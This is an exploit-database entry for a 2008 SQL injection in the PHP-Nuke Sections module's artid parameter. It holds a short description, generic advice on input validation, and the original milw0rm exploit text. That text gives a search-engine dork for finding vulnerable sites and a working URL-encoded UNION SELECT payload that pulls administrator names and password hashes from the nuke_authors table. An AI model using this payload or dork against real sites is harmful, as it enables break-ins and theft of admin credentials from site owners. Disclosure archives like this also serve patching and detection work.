header-logo
Suggest Exploit
vendor:
PHP-Nuke Module Sections
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP-Nuke Module Sections
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP-Nuke Module Sections SQL Injection(artid)

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable parameter in the HTTP request. This can allow an attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

###############################################################
#
# PHP-Nuke Module Sections SQL Injection(artid)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: "name Sections op viewarticle artid"
#
################################################################
example
www.xxX/xxxxSections&op=viewarticle&artid=(exploit)

EXPLOIT :

-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2


################################################################
# S@BUN            i AM NOT HACKER            S@BUN
################################################################

# milw0rm.com [2008-02-19]